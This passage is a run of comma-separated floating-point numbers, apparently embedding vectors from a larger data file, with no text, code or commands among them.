0.0023072183,0.021083824,-0.001702307,-0.013226905,0.026936816,0.0074998005,-0.011850974,-0.0020276553,-0.018394565,-0.0118907895,-0.0067094644,0.006037219,-0.0010171368,0.11778635,0.017138312,-0.0075096185,0.008632135,-0.014699069,-0.019093907,-0.017508632,-0.00005140677,0.007059821,-0.008481252,0.018676732,-0.036551673,0.005295552,-0.009778901,-0.003045619,0.0016120943,-0.012722164,-0.019854102,-0.0058176527,0.0015861504,0.034386445,-0.018179828,-0.013230455,-0.062467102,-0.0135377105,-0.039470684,0.01135079,-0.010699604,0.0028879084,0.021196535,0.0015502467,0.003967223,0.019619126,0.0066241603,0.0034841804,-0.012297947,0.018626628,-0.017722368,0.0075704693,0.008190782,-0.0033331004,0.00060984184,0.012316271,-0.030895393,-0.024642011,-0.022165671,0.008850783,-0.028707309,-0.004223082,-0.017029202,-0.008903668,0.019160194,-0.0029474858,0.0041539883,0.019498635,0.0015367996,-0.008144266,0.017974397,0.024294976,-0.0164519,-0.009156415,0.002438484,0.008528495,-0.020431835,0.019014347,0.017951189,-0.002886971,0.002562342,0.015989488,-0.021255728,0.015645113,0.018378653,-0.0033694473,-0.0009291908,0.0075318464,0.0021506327,-0.004400428,-0.009072095,0.025563197,-0.020555988,0.0007771428,-0.0116847325,0.006168157,0.00742129,-0.0035427443,-0.0051480997,-0.011851203,0.01581625,-0.02074168,-0.03120407,-0.028607642,0.022530686,0.01811217,-0.002802496,-0.018335681,0.0019425368,0.022005314,-0.0011820709,-0.025381727,-0.005170339,-0.03459272,-0.010872424,-0.0025738857,0.013072414,0.0011201125,-0.0056489715,0.0024616183,0.008080334,-0.021325495,-0.00995651,0.009697193,0.018294739,0.0072029703,0.01942782,0.0012436259,0.013934968,-0.028304141,-0.014844783,-0.010742186,-0.018759163,-0.0035325896,-0.0030595567,0.006359632,0.015163658,0.0064706076,0.0011333661,0.0026870607,-0.009329301,-0.0075428705,0.006595923,0.0066920198,-0.022971634,-0.0060299905,0.0004775376,-0.0099251475,-0.0034324662,0.01123858,-0.0029263813,-0.010239709,0.000009224608,0.010927242,-0.015090678,-0.01496225,-0.02339336,0.023414861,-0.031751126,-0.00880024,-0.006383419,-0.00015593595,0.027733339,0.0064756083,-0.0013026295,-0.0033404168,-0.0065928423,0.009954019,-0.012778288,-0.0067548524,-0.017219093,0.0075560263,0.00197966,0.020635653,-0.0075422134,0.012036524,-0.031094367,0.03237082,0.015180382,0.02817892,0.0028646016,0.0007458975,0.013216393,-0.0070359623,0.0017020926,0.01781884,0.0029068505,-0.00035560736,0.0036644088,0.027498284,0.016609142,-0.011704494,-0.003312204,0.013007219,0.012230406,0.0026095305,-0.010466536,0.010753359,0.0010307359,0.02420193,0.0065458976,0.0016578395,0.026719904,-0.008738473,0.001446582,-0.005265048,0.026956026,0.007889358,0.019088712,-0.012561906,0.03043382,-0.019855047,-0.014374908,0.0019951116,-0.017456338,0.017881256,-0.021181056,0.0070415256,-0.031118304,0.0004954635,0.0017604135,0.003908504,-0.011324101,0.0062551727,0.013554704,0.0105657205,-0.0269376,0.015533178,-0.003568276,0.007161751,-0.02096682,-0.02885388,-0.0086318655,0.0116325235,-0.0016998743,-0.029275848,-0.010919054,-0.009970873,0.017885407,-0.0011757996,0.012710125,0.026478006,-0.0018476858,-0.005914122,0.0074708145,-0.00055779814,0.002199114,-0.008586821,-0.0006401724,0.034567792,0.02432866,-0.006714529,-0.0077867135,0.0012249715,-0.0030788996,0.03497339,0.029175062,-0.029255347,-0.008681328,0.012972452,-0.039088313,0.0020911375,-0.01096912,-0.0062227715,0.01297233,-0.009649906,-0.02011104,-0.03385679,-0.013538335,0.0095849,-0.0008008748,-0.018221162,-0.011916963,-0.0022085414,0.0007894643,-0.0059488323,0.026417326,-0.011373168,-0.03041165,0.0002763847,0.013840763,-0.005502909,-0.012559315,0.007329953,0.026576111,-0.017263288,0.0094012655,0.00188643,-0.031155592,0.0012141865,-0.0029086461,0.012165664,-0.017551176,0.0146223465,0.0040425067,-0.009682033,0.005318081,0.006241005,-0.0062389146,0.002907842,0.027038759,0.03226466,-0.048596106,-0.0052147238,0.015127563,-0.0126488665,-0.03229108,0.027251588,-0.021297384,0.00010661599,0.008395987,-0.013916675,0.022503024,0.0023787236,-0.0505702,-0.014449723,0.031766836,-0.018096184,-0.0062525165,0.024263348,0.0030362909,0.004072103,0.011709782,-0.010448137,0.0051690512,0.0010582285,-0.024074893,0.01404185,-0.017610349,0.0066671087,0.025392327,-0.008916989,0.0026037318,0.012408198,-0.019135218,0.0072356453,0.019479824,-0.016160415,0.011117423,-0.009359666,-0.03918973,-0.02930816,-0.02323881,-0.003915636,-0.015396522,0.021404952,-0.022161072,0.0029817063,0.0081567485,-0.011509641,0.12929185,-0.03846759,-0.00754598,0.015300747,0.013985385,0.01148519,0.0044760196,0.019766986,-0.012035651,-0.0019814963,0.005240302,-0.014363706,0.01795873,0.030940227,-0.022807421,-0.022150913,0.0023941158,0.12133342,-0.00817867,0.031057239,0.022403834,0.003149198,-0.0077372426,0.0026146169,0.0079920385,-0.053124018,0.013005333,-0.038088623,-0.0014977623,0.0050484007,-0.028690787,0.027450403,-0.011311981,0.006605498,-0.028545875,0.006531246,-0.007364637,-0.010023054,-0.013094958,-0.016999206,0.012789459,0.0011049872,-0.0126882,-0.004031525,-0.0028030383,0.0022375227,-0.021920651,0.010577771,-0.012751477,0.008426026,-0.008959374,-0.02096149,-0.00059425633,0.00036434736,-0.0077181566,0.013617058,-0.00018836292,-0.025046127,-0.023214089,0.010097058,-0.0113175195,0.032572854,-0.012571497,0.016726885,-0.009473216,0.0042132433,-0.009588765,0.006603577,0.013386501,0.016253833,0.034197357,0.027262766,-0.003222496,-0.022841725,0.021550672,0.010323202,-0.013309691,-0.0094880015,0.021536205,-0.011414003,0.019452607,0.019332692,-0.004758955,0.021643322,0.041093666,0.032358583,0.009423418,-0.0076312274,0.0038174053,-0.028934103,0.013824745,0.006224894,-0.010028765,0.0011591233,0.008990338,0.011032594,-0.0023026543,-0.017551897,0.000731587,-0.01843121,-0.018451653,0.025957404,-0.013020822,0.02422658,-0.011430767,0.0026116532,-0.010984475,-0.016541185,0.00034494905,0.00823879,0.008433519,-0.0008499749,0.003890024,0.025589185,0.010381831,-0.0064274706,-0.017940776,0.0008428825,-0.012751133,-0.0015457763,0.011384288,-0.010907716,0.003353634,-0.01123915,-0.012911373,-0.005103626,-0.01605197,0.0039124615,0.003927198,-0.0017648132,0.0007013479,0.0117956195,0.014787287,0.04991908,0.007304946,-0.02986329,0.008428827,-0.008590171,-0.024406,0.013877904,-0.009031584,-0.0048681414,-0.028874107,0.0015215788,-0.015524625,-0.009906611,-0.009349489,-0.023289425],[-0.0060813534,-0.0008921664,-0.0182469,-0.01434949,-0.00019866289,-0.017723113,-0.018075058,0.016778236,-0.008899113,-0.018378558,-0.009679402,0.025202716,-0.015955543,-0.0110452585,-0.019943615,0.00045649908,0.021878308,0.001381933,0.010651857,-0.0076994887,0.005734537,0.001710597,0.02315058,-0.006910423,0.015552824,0.014172041,-0.019629996,-0.0060510407,-0.0058052274,-0.006472567,-0.010465782,0.023725089,0.020914981,-0.00028548716,-0.0117540825,-0.0031681429,-0.011160349,-0.027992574,0.015781522,-0.008696728,-0.007577765,0.008358983,0.002758006,0.025785226,-0.0068991277,-0.0024328067,-0.019900154,0.016230075,-0.022856351,0.004992285,0.0049527865,-0.007086267,-0.01939645,-0.0012673633,-0.00259022,0.022040391,0.0031050798,-0.030700078,0.008671099,0.003903132,-0.012063943,0.00639608,0.00042686734,-0.015995162,0.03842579,0.0020737748,0.0029287492,-0.0015759725,-0.024463344,-0.022314547,-0.007195028,-0.025165558,0.0012314067,0.009368051,0.01860108,0.0102294935,0.008083897,-0.022868266,-0.015802057,0.0046880255,-0.0052170823,-0.008461118,-0.0050511123,-0.021602295,0.0031308085,-0.012319369,-0.016112141,-0.0037593318,-0.027232869,-0.025187721,-0.015338738,-0.003695557,0.010646609,0.007319354,-0.023995686,0.008998491,0.018771267,-0.00045294908,0.00027468806,0.02295624,-0.02234195,0.0003755372,-0.024909344,0.015003721,0.019836975,-0.034136888,-0.00928496,-0.019692369,-0.006522938,-0.017124005,-0.008159771,-0.008472519,0.023403363,0.0110001145,-0.0044927634,-0.0129203135,-0.013702014,0.012103271,0.008356266,0.012609504,-0.005338915,0.045420565,0.018076714,-0.0082792835,-0.0060379845,-0.012764275,0.00021660501,0.029507209,0.0065466496,-0.0032124184,-0.0038092493,0.010021558,0.0037462807,-0.0045516114,-0.015362607,-0.007292983,0.0027086737,-0.0038831567,0.0061677094,-0.01349914,0.021067603,-0.010183094,0.0056425417,-0.0007858902,0.036220994,0.026492069,-0.00839227,0.033274293,0.016827954,-0.028149132,0.0142139895,-0.010250678,-0.015498154,-0.021679204,0.009707413,0.030056057,0.018193686,-0.017742224,-0.026227098,0.0010234615,-0.013014249,0.005419762,0.01770096,-0.011290271,-0.018885607,-0.045137238,0.0026425642,-0.0154386405,-0.01769303,0.030580388,0.0045167957,0.016722387,0.017483093,-0.00048952905,0.0073684226,0.016172746,0.018424585,-0.027617643,-0.010605075,-0.016046394,0.015876813,0.0044968566,0.0216795,0.0016671575,0.0051492094,0.027802886,0.009217357,-0.018781507,-0.00166808,0.0035288362,0.0026040399,-0.028014217,-0.008505398,-0.0055969525,-0.019824574,-0.038525783,-0.009664116,0.102238744,-0.0005004951,0.0012287331,-0.024491515,-0.00046642765,0.009847696,-0.02476109,-0.011157164,-0.010219787,0.0022627912,-0.0074834474,0.02404225,-0.006806198,0.002182805,-0.014432849,-0.0034373817,-0.000028431901,0.0104400385,-0.0516077,0.01732781,0.008676214,0.01087993,0.007455024,-0.027674448,0.0026695624,0.006565035,-0.03912767,-0.008599293,-0.030381432,-0.01428796,0.010530785,0.02324582,-0.016828062,0.004528301,0.009347913,-0.016390942,-0.01539602,0.023822656,-0.008820391,0.0009782235,-0.0065660663,0.003620257,-0.00078086625,-0.00793758,0.008064181,0.027156692,0.022454904,0.00021546359,0.015245347,0.016493965,0.0073537366,-0.009539659,0.005369823,0.012649673,0.004666255,-0.017750207,0.027698755,-0.001046582,-0.010624857,-0.01904146,-0.009454988,-0.0032144573,-0.0009454122,0.019644072,0.010292062,-0.008733517,0.018395087,0.042790014,0.021810157,0.021805959,-0.03073805,-0.02131206,0.01059922,-0.013320987,0.0009753233,-0.017824674,-0.011315305,0.0006994803,-0.017145345,0.009160663,0.0102924295,0.0045593614,-0.014279454,-0.0026846381,0.013032587,-0.0055606053,-0.012286165,-0.0059920116,0.005981711,-0.030715438,0.022042163,0.031263042,-0.0014167223,0.0019730409,-0.00008457639,0.016647618,-0.012151199,-0.022193814,-0.010728359,-0.005409028,-0.006390774,0.004497889,-0.03138027,-0.014283134,-0.013101735,0.022565477,0.0082764225,0.000053393112,-0.011314468,-0.002258344,0.044176623,-0.019952053,0.017637147,-0.029692851,-0.02289727,-0.020358166,-0.011535669,-0.002111779,0.0011700757,0.0019362317,-0.017021483,-0.02527041,0.017920509,0.015200551,-0.029889839,0.011667454,-0.030661628,-0.015277918,0.015188449,0.013212152,0.0065031494,0.010170451,0.0024430607,0.0017988159,0.01689171,0.031639636,0.028144144,-0.013113522,0.017303323,-0.002215876,0.01150979,0.009922182,0.008713774,-0.008635148,0.011403612,0.006558936,0.0045966376,-0.009085441,-0.009889303,-0.012786029,0.022246333,0.023492308,-0.0069563156,0.028275836,-0.005474806,-0.0020996174,-0.007235296,-0.018328412,0.0037434283,-0.0053967913,-0.026316198,-0.010574291,-0.015901985,0.014003292,0.015092148,-0.020673372,0.008467955,0.08946435,0.006147816,-0.0022264235,0.0120793255,-0.021213278,0.016903747,0.020302724,0.021827439,0.0077339155,0.0055286386,-0.020495314,-0.016017012,0.0062230323,0.005507937,-0.016073853,0.018588625,-0.010076979,-0.01910414,-0.02088438,-0.014302763,0.02896988,-0.02106193,0.0013177362,0.015754985,0.0035940565,0.02957653,-0.0069782864,0.006607747,0.010136093,-0.016269887,-0.021164717,-0.0070565515,-0.008574041,0.0117441015,-0.042982485,0.014888061,0.016440034,0.0075169755,-0.024413621,-0.004642821,0.010213737,0.010888305,-0.003630999,-0.019068262,-0.015346615,0.027491005,0.005448341,-0.0044239615,-0.020522313,0.01642703,-0.0008553044,0.032399893,-0.018830132,0.0038059708,-0.006325393,0.0145293735,0.011204376,-0.027578747,0.026032612,0.026929922,0.002747719,0.002819248,0.010554796,-0.0022674026,-0.00049432705,0.021324541,0.0046814266,-0.014027073,-0.008465796,-0.0058806627,-0.006215932,0.008995926,-0.0048761,0.015355255,0.0019480187,0.02273942,-0.0038801308,0.0084877955,0.016009416,0.013716015,-0.025307892,0.01705446,0.026214393,-0.019343007,-0.012974458,0.021762947,0.009752097,0.0133710755,0.035317235,-0.0050094323,-0.0064176074,0.028791158,-0.011779894,-0.0005249635,0.03977354,0.017648555,0.0154545745,0.019426037,-0.005908499,0.00504927,0.008726197,-0.027339885,-0.0089782225,0.008029581,0.0022602715,0.0052416036,0.013527564,0.0024484557,0.003412956,0.030658508,0.008378231,0.017238256,0.010777706,-0.012846504,0.0027551383,-0.032250952,0.002261355,-0.005645154,-0.00046538445,-0.0095017,0.020788297,-0.009231876,0.012393266,0.020155035,-0.0011711912,0.022710213,-0.0058479914,-0.008048818,0.008436901,0.020825965,-0.0006162253,0.032915525,0.0075659356,-0.023672085,0.007737805,-0.0076999622,-0.012528862,-0.033133928,0.03700546,-0.0007896763,0.019935073,0.027154895,0.031450965,-0.0063837273,0.00722496,0.009294302,0.030841136,0.0025418513,-0.030824127,-0.011649396,-0.0012684097,0.0055617066,-0.007654025,-0.001013728,0.015599805,0.008020918,0.02202448,-0.028778942,-0.0070346803,0.020475002,0.032204792,-0.030101037,0.0116313165,0.011129846,-0.013686965,0.02694631,0.0045077107,0.055258155,-0.01505747,-0.014682813,0.00088974234,0.016140696,0.0039067985,-0.015747461,0.019043084,-0.017168468,0.0072313473,0.0270806,0.017986167,0.024828535,0.00978479,-0.00068750157,-0.010630476,-0.00060682115,0.0012924935,-0.006418752,-0.00087559375,-0.0016657917,0.0047651636,0.014580538,-0.014643939,-0.014642283,0.0066346587,0.013536395,0.001250733,-0.024040228,-0.016592052,-0.0062010516,-0.006518875,0.012079119,-0.008017057,0.009586034,0.015384486,0.019979296,-0.0011752392,-0.016522605,0.020113204,-0.0008504837,0.018362643,0.006123218,0.0071534617,0.038635913,-0.021917898,0.008278226,0.010563845,0.009216289,-0.020924402,0.012729248,0.030308481,0.0045781434,0.002700069,-0.017342754,-0.0013574779,0.00928943,0.010456705,-0.0011133075,0.007587993,-0.020761034,-0.0119775105,-0.02555314,-0.007518863,-0.0035580345,-0.0020632087,-0.007264792,0.011120592,-0.010531236,-0.03038541,0.0023119196,0.009119571,-0.011879299,-0.012115288,0.020517608,0.0075003193,-0.013691132,0.011646185,0.0031258233,-0.0026879604,-0.0011419388,0.015237884,-0.011775279,-0.0151177095,0.0073476657,-0.0019689475,-0.0022466728,-0.0037115847,0.003198315,0.004744381,0.015469156,-0.017533807,0.016136598,0.0006697596,0.019791907,0.009869784,-0.0085239345,-0.042170584,0.0040794206,0.009416783,-0.024273086,0.0032885186,-0.012746544,0.044866387,-0.014776657,-0.0080912905,0.00006097417,-0.011418933,0.01144606,-0.017636035,0.017606182,-0.048766073,-0.00023993923,0.0008468455,0.004130796,-0.016680488,0.034718394,0.020061238,-0.004170077,0.002087236,-0.012938509,-0.012038107,0.0017518093,-0.017499467,0.012472637,-0.005421743,-0.006664684,-0.034610912,-0.01014486,-0.023410514,-0.037976783,-0.021972984,0.04308629,0.016079001,-0.0016167384,-0.0006200458,0.01287897,-0.014992412,0.004567661,-0.0063172956,-0.031081598,0.004998836,0.009941548,-0.003931714,0.004208558,0.0077766078,-0.008916551,-0.012027033,-0.04093774,0.0021965834,-0.00028301892,0.01565754,-0.017413158,-0.008719213,0.00778678,-0.023115695,0.018659122,-0.013792637,0.038465768,0.0004678618,0.034278225,0.017736955,0.018199295,-0.0020038376,0.004309857,-0.006236378,0.008475335,0.007542036,0.028233333,0.017586617,0.013646964,0.01126867,0.0003770484,-0.018833311,-0.009652472,0.014713587,0.02369259,0.036869965,0.009104402,0.024734506,0.0039607957,0.014390588,0.019157527,0.006220114,-0.0032824648,0.010126083,0.028989945,-0.0007450144,0.019554863,0.007929458,0.01722178,-0.01628345,-0.02113674,0.00046282646,0.037315648,0.032894485,-0.012948522,0.00028600014,0.0033598945,0.0120746605,0.013335216,-0.0076486734,-0.010470221,-0.0039727753,-0.020582268,-0.0048227273,-0.03431062,0.010556482,-0.04040768,-0.006035122,0.014400676,0.020234846,-0.013992493,-0.0035959654,0.0060069254,0.011586267,-0.021161404,-0.039181076,-0.019019296,0.011750687,0.017911509,-0.0284499,-0.005125857,0.0062145228,-0.007798654,0.014302757,0.011316429,-0.029022187,-0.001826892,-0.013284385,-0.014530363,0.0041460516,0.009748975,0.018659417,0.002688416,-0.010149075,-0.023814486,-0.015100173,-0.022577357,-0.0030206677,0.0042733867,0.011294373,-0.0008200422,0.016864007,-0.007734452,0.0010682015,0.008843264,-0.00012305088,-0.034747563,-0.024759647,0.012219807,0.021387106,-0.021912219,0.010661115,-0.028041061,0.025218157,0.0356496,-0.00983447,0.0037959837,-0.0028789316,-0.005448694,0.028482074,0.04141011,-0.0099087,-0.02338841,-0.026543578,0.0046287836,-0.0130319595,0.005583039,-0.005794423,-0.00057828915,-0.0095557505,-0.033932664,-0.0076658833,-0.023774412,0.0011537446,0.0064002625,-0.027917447,0.03932652,-0.021597529,0.020017106,0.013748231,0.012089484,0.01940438,-0.0018132939,-0.0015556725,-0.035534587,-0.031207237,0.020103296,-0.004225895,0.02780711,0.014258675,-0.024794985,-0.014460212,-0.017264523,0.008548186,-0.022401122,0.020468146,-0.0018801125,0.0016889691,-0.02821411,0.015490096,-0.005303736,-0.009960036,-0.030338792,0.0031394907,-0.0068602175,-0.0037919336,0.015267174,0.011229654,-0.038109757,0.026231827,-0.0025199642,-0.0067243013,0.017175011,0.012095058,-0.0024314097,-0.00090026326,0.0061101983,-0.0012880831,0.003526394,0.025820266,-0.0025525126,0.0009837758,0.02017196,-0.010138521,0.004337731,-0.00015416818,-0.014420562,-0.021496803,-0.017630292,-0.004291684,-0.020145738,0.01523067,0.0039701555,0.0072885845,0.014313879,0.008902365,0.035913274,0.012009267,0.0034489864,0.029061498,-0.0033016198,-0.018446531,0.002530145,-0.0016905679,-0.013002246,-0.013359843,0.0043868176,-0.009796419,0.022193221,0.028333167,-0.015145592,-0.025670197,0.027692523,0.002037213,0.0062543387,0.011635009,-0.014153354,-0.004804746,-0.010246006,0.02397826,-0.034073036,-0.03048019,-0.022432305,0.0047017965,0.013214625,-0.02534103,0.002177191,0.0027952662,-0.017434858,0.020737745,-0.0066440324,-0.008629152,-0.012549873,0.005353185,0.0017854847,0.008592145,0.014238285,-0.00045083466,-0.008540555,0.003298309,-0.0018143959,-0.010028425,0.00078075856,0.0049331845,-0.004459765,0.010764213,-0.0032992698,0.0017080419,0.0056304727,-0.0037726543,0.0028912756,0.021250384,0.0012912584,0.014978578,-0.014288486,0.0066866083,-0.0054893037,0.015815593,-0.041552108,-0.011048198,0.009279202,0.019998437,-0.023871168,-0.014768567,-0.0019142479,-0.055217274,0.008605755,-0.012894278,-0.019875815,-0.008461346,0.010526807,0.013384025,0.008982793,0.030867035,-0.009713296,0.017403362,-0.007817517,0.020422101,0.007903278,-0.0032243978,-0.010523571,-0.032503802,-0.0021948782,0.029700419,0.010854568,-0.00971342,-0.005449625,-0.0006716392,-0.004650342,0.03603135,0.013005724,0.011082133,-0.016069889,-0.01695071,0.019466717,-0.0070689865,0.014644177,-0.011161642,-0.0052874223,-0.014446337,-0.018096875,0.007826403,0.007840347,-0.005117647,-0.0046238434,-0.010318802,-0.018900381,0.00017768623,0.02187118,-0.0048386264,-0.0223483,0.019040076,-0.013148325,0.0116212545,0.008285623,0.021320026,-0.0061950544,-0.00786045,0.021832911,-0.018121773,0.028703427,-0.010757622,0.008581087,0.011078863,-0.005373931,-0.0049109547,0.0025709264,0.017236752,0.022890769,-0.009376748,-0.0018299005,-0.0046832515,0.03441061,-0.021737041,-0.0062916246,-0.013650756,-0.0042916695,-0.020824272,-0.026094086,-0.008819014,0.029678661,-0.002305465,-0.015553584,-0.0017122712,-0.010133636,-0.03460631,0.013857683,-0.02121014,-0.008496435,-0.015454615,-0.021037385,0.0009657896,-0.0010626687,-0.0012806401,-0.0016980264,-0.007267055,0.01197717,0.0154202655,0.011170451,0.009661844,0.01365226,-0.011467308,0.003928118,-0.006236296,0.0028139232,0.023533665,-0.004913438,0.010827464,0.059549157,0.00080569007,0.0012290651,0.010688262,0.01604461,0.021189403,0.016871572,-0.016762147,-0.009089212,-0.0032674486,0.038958035,0.0103078075,0.01457619,-0.002114221,0.023287581,0.0075011994,0.017570686,-0.0017326267,-0.020596597,0.02669037,0.009465225,0.027381372,-0.008970751,0.0093456395,-0.0072469614,-0.0036852865,-0.012028765,0.006022411,0.0049867854,0.008793773,-0.008116881,0.015615584,0.0024185432,0.0026466271,-0.02102338,-0.01264488,-0.0044908114,-0.015984733,-0.005989347,-0.0119289225,0.004635047,0.014214578,-0.025575994,-0.0075490996,-0.0120222075,0.0091519775,0.011877416,-0.002230043,0.017649284,0.0019108125,0.003454375,0.006284651,0.005882688,0.008402703,-0.0045363745,0.00057333964,-0.0013467039,-0.008810243,-0.030707134,-0.029346973,-0.00095576304,-0.03418948,0.021816565,-0.010872202,-0.0067577767,-0.019123612,-0.005151286,-0.0047203973,0.0026213264,0.0004378592,0.02517109,-0.006063923,-0.020196656,0.023185305,0.013259478,-0.0196203,0.02117919,-0.002731922,0.03171235,0.00903693,-0.016487036,0.016903432,0.0006609776,-0.0226621,-0.011444744,-0.016358515,-0.005674106,-0.012103133,-0.0076340055,0.00028569618,0.0015672015,-0.0108757485,0.042084556,-0.02384611,0.0152428895,0.010754426,-0.019659253,-0.007919459,0.028220966,-0.008965313,0.021696381,-0.025550414,0.005880592,0.006839617,-0.03426504,0.003975505,-0.0115939975,-0.003348695,-0.0042749085,-0.004476654,-0.011355882,-0.017552417,-0.012027671,-0.04415419,0.005489042,0.014733908,-0.013026212,0.021982498,0.022295376,0.0060767797,0.014672319,-0.012717394,-0.010964108,0.009396178,0.012490844,-0.008623162,0.016065132,0.025841285,-0.0035527607,0.010188338,0.019002296,-0.025640676,0.00062619033,0.0018179411,0.01098609,-0.017772177,-0.012308565,0.002414506,0.010253729,0.0023846554,-0.011338773,0.0031378071,0.03637076,-0.0008404781,-0.0018737534,0.006355938,0.021988284,0.014317299,-0.0016258124,0.023532437,0.011218722,-0.025069479,-0.0007218718,-0.015174288,-0.010697916,-0.0024473623,0.006797046,-0.004612599,-0.0011442954,-0.0035534755,-0.010220142,-0.023913557,-0.009459076,-0.017376514,0.0026073027,0.037063006,-0.004100008,-0.00675074,0.013162068,-0.015998527,0.019025506,0.011700693,0.00923275,-0.037263673,-0.014351584,0.016452854,0.0061515295,0.010428737,-0.00062892237,0.0047631036,-0.03861648,0.008880715,0.024350768,0.003035196,-0.024572618,0.015322467,0.0038357195,-0.020411193,-0.03586741,-0.0011994266,0.0018708521,0.0051102485,0.012012025,-0.01969054,-0.0024767658,-0.008527389,-0.0056346064,0.078850135,-0.021931883,-0.0018411578,0.0012967942,0.0067414106,-0.010229473,0.014945661,-0.001598509,0.009784419,-0.013197983,-0.020093681,-0.016893702,0.011897634,-0.009989916,0.0023028043,-0.0033935008,0.0072025876,0.026450185,0.010837134,0.020944405,0.008092362,0.023647541,-0.0020758742,-0.004575032,0.0061980207,0.018564178,0.015553257,-0.02845395,0.015165874,-0.011895195,0.008180693,-0.018793361,0.0044041746,0.017040566,-0.0029869648,0.0017492543,0.0077684144,0.0018839877,-0.019247465,0.021591261,-0.0075524715,-0.0037682452,0.028217318,0.005058994,0.0030226114,-0.020975858,-0.015529542,-0.0082374625,-0.004613062,-0.014938773,0.004959712,-0.0111539215,-0.0058672247,0.007503981,-0.02423931,0.011305662,-0.0003797322,0.032090772,0.035132162,-0.008524655,0.00751428,0.018806832,0.0050810124,-0.019022502,-0.01908858,-0.006231172,-0.004648449,-0.009457062,0.027923288,-0.009238009,0.017394587,-0.013430204,-0.0005158145,0.010883017,-0.003201796,0.028961986,0.010003259,-0.010259389,-0.006520201,-0.029324587,-0.008250874,0.006607074,0.026168121,0.015803993,-0.013491374,0.0023522524,0.0047061127,0.00027480203,0.09090201,0.021641605,0.014250589,-0.0036115393,-0.0014704628,0.013127252,0.0068934117,0.025971912,-0.0068665403,0.015650254,-0.031016015,0.012120064,0.021271981,0.018341295,0.019705264,-0.01717698,0.013730081,0.002543899,-0.004999858,-0.036021613,-0.00719734,0.03787148,0.012699344,0.00436642,0.006653958,0.005830123,-0.005592385,0.0074743424,0.010138687,-0.0034100688,-0.019862376,0.022188991,0.012893647,0.017917026,-0.028414544,-0.049621724,-0.0026443347,0.12541781,0.004926872,0.0006542181,0.019686451,0.0035308066,0.0057692057,-0.10979506,-0.0012202192,0.023555623,0.0064362935,0.0066618873,-0.008264679,-0.005540048,0.021782842,0.015579518,-0.019828638,-0.006339937,-0.0108124465,0.02912315,-0.014952991,-0.00499349,0.019411922,0.0044623823,0.010490663,-0.009505217,-0.0048272884,0.008256922,-0.010795391,-0.012079303,-0.006612672,0.011072949,0.0015315999,0.01217282,-0.007660396,-0.023346685,0.0153054055,0.023678083,-0.0056749145,-0.02112847,-0.014611712,0.008973649,-0.013290232,-0.021077046,-0.030356929,-0.1471644,0.016144913,-0.008887391,-0.04085067,0.034884844,-0.020341342,-0.0038136193,0.0065413075,0.015070062,0.013584267,-0.00059907784,0.017824156,-0.0074898656,-0.0067718164,-0.016137345,0.0072156787,0.010468321,0.003369086,0.0027683242,0.009247303,0.009192664,-0.008409163,-0.030060193,-0.0043147914,-0.016449118,0.0070074215,-0.006951441,0.025674997,0.0027759962,0.001676057,-0.004043879,0.0020437406,-0.019981135,0.006473321,0.0052288584,-0.018117705,-0.014549686,0.0046177674,-0.01021785,0.015636919,-0.014974313,-0.0014267467,-0.008059533,-0.007017989,0.0077640787,0.016464544,0.013485755,0.006753744,0.024631154,0.013584504,0.023382258,-0.0006722262,-0.0065215733,0.018025864,-0.0161606,-0.01806175,0.0066035674,-0.019412715,-0.006848621,0.0059070634,0.0016050267,-0.0070707197,0.00024236657,-0.0213031,0.047389276,-0.013859648,0.0077859624,-0.013128454,-0.0015752375,-0.0040332065,-0.004148368,-0.0043884623,-0.0064413473,-0.023858305,0.030574543,0.010026608,-0.009026566,-0.000774521,0.022490878,-0.009923082,0.013851277,-0.005004123,0.005771887,-0.018382406,0.004445286,-0.0068595037,0.012101278,-0.01386855,0.0033968515,-0.0048534875,0.019058889,-0.007738867,0.025069647,-0.0024819716,0.019561794,0.0011648843,0.041113768,-0.0043073795,-0.017636528,0.013629095,0.0017470064,-0.009981584,-0.014815964,-0.0041810013,-0.024582716,0.020920103,-0.0060841315,-0.01589779,-0.022935942,-0.002381464,0.002200585,-0.017375808,0.021801572,-0.0069937566,-0.035686336,-0.018844698,0.006384978,-0.00019088083,0.0095869005,-0.012721563,-0.031797417,0.01623011,-0.007397244,-0.007088311,0.041991856,0.0013855458,-0.015842104,-0.0077729444,-0.0033916612,0.008915107,-0.022560362,0.006364448,0.0050500953,-0.0123193925,-0.02949022,-0.008367509,-0.011927718,0.024867099,-0.027777422,-0.016914926,0.00044746712,0.006287976,-0.012017493,-0.0034424502,0.019507274,-0.0076706046,0.04186945,0.00083546794,0.011383046,-0.0073025366,0.016372569,0.02697347,-0.014411226,-0.03477951,-0.00093352265,0.08584047,-0.0056565534,-0.015571971,0.024573209,0.00608284,0.0026849539,0.018371772,-0.015149894,-0.015206565,-0.012703324,-0.010493821,-0.008172125,-0.0008462001,0.027671365,-0.021036696,0.018825285,0.0073332125,0.027486082,-0.0030009525,0.008952599,0.022165151,-0.010151009,-0.006520317,0.025538338,0.007390309,0.0057299566,0.007094511,0.0016959207,-0.009219972,0.014335747,-0.036573164,-0.010443766,-0.0035259451,0.0017477905,0.018787839,-0.046108875,-0.03023699,-0.0014398219,0.007077033,-0.03531531,-0.0006591098,0.03021175,0.015747754,-0.025421128,-0.010472633,-0.020503659,-0.005704918,0.009172898,0.0053331954,-0.002149934,0.0002683784,0.0068409857,0.002078642,-0.0058746804,-0.001587951,-0.005914433,-0.02091523,-0.009808926,-0.009472221,-0.015741687,0.022665238,-0.0050031943,-0.032506768,-0.02222643,-0.0069210227,-0.002409938,-0.009924976,-0.007760389,-0.0077876598,0.008524274,0.00093490066,0.0043661925,-0.02138408,0.009269733,0.00973014,-0.0035657345,0.001334216,-0.0028643901,0.0025518683,0.029692337,0.019589609,0.015500567,-0.00012301627,-0.019265944,-0.0051244297,-0.023576915,-0.021620024,0.040186778,-0.02383708,0.0047209673,0.030639138,0.010982316,0.000086183514,0.0011642365,0.018328426,0.020575376,-0.0005676903,-0.0022735505,0.021071991,-0.013269151,0.019902293,0.011345529,-0.016172718,-0.009688543,-0.009118681,-0.018122263,-0.025349645,0.022552548,0.020184753,-0.014831701,0.0046307845,-0.011627279,0.02226256,-0.028106967,-0.013751196,0.051676795,-0.013020521,0.02574903,0.008099393,0.0060233767,-0.018325606,-0.007067285,0.003257508,-0.0031070875,0.018598031,-0.019124165,0.009537913,0.006227232,-0.025182867,0.022830417,-0.0082255695,0.025756741,0.006037363,-0.0059835515,0.0094700195,0.0029964957,0.028379653,0.008979031,0.008499959,0.019776953,-0.004464849,-0.0037848577,-0.008889725,-0.0005660451,-0.010565723,0.009274611,-0.0043048416,-0.019464057,-0.008741736,0.0018159439,-0.023353802,0.00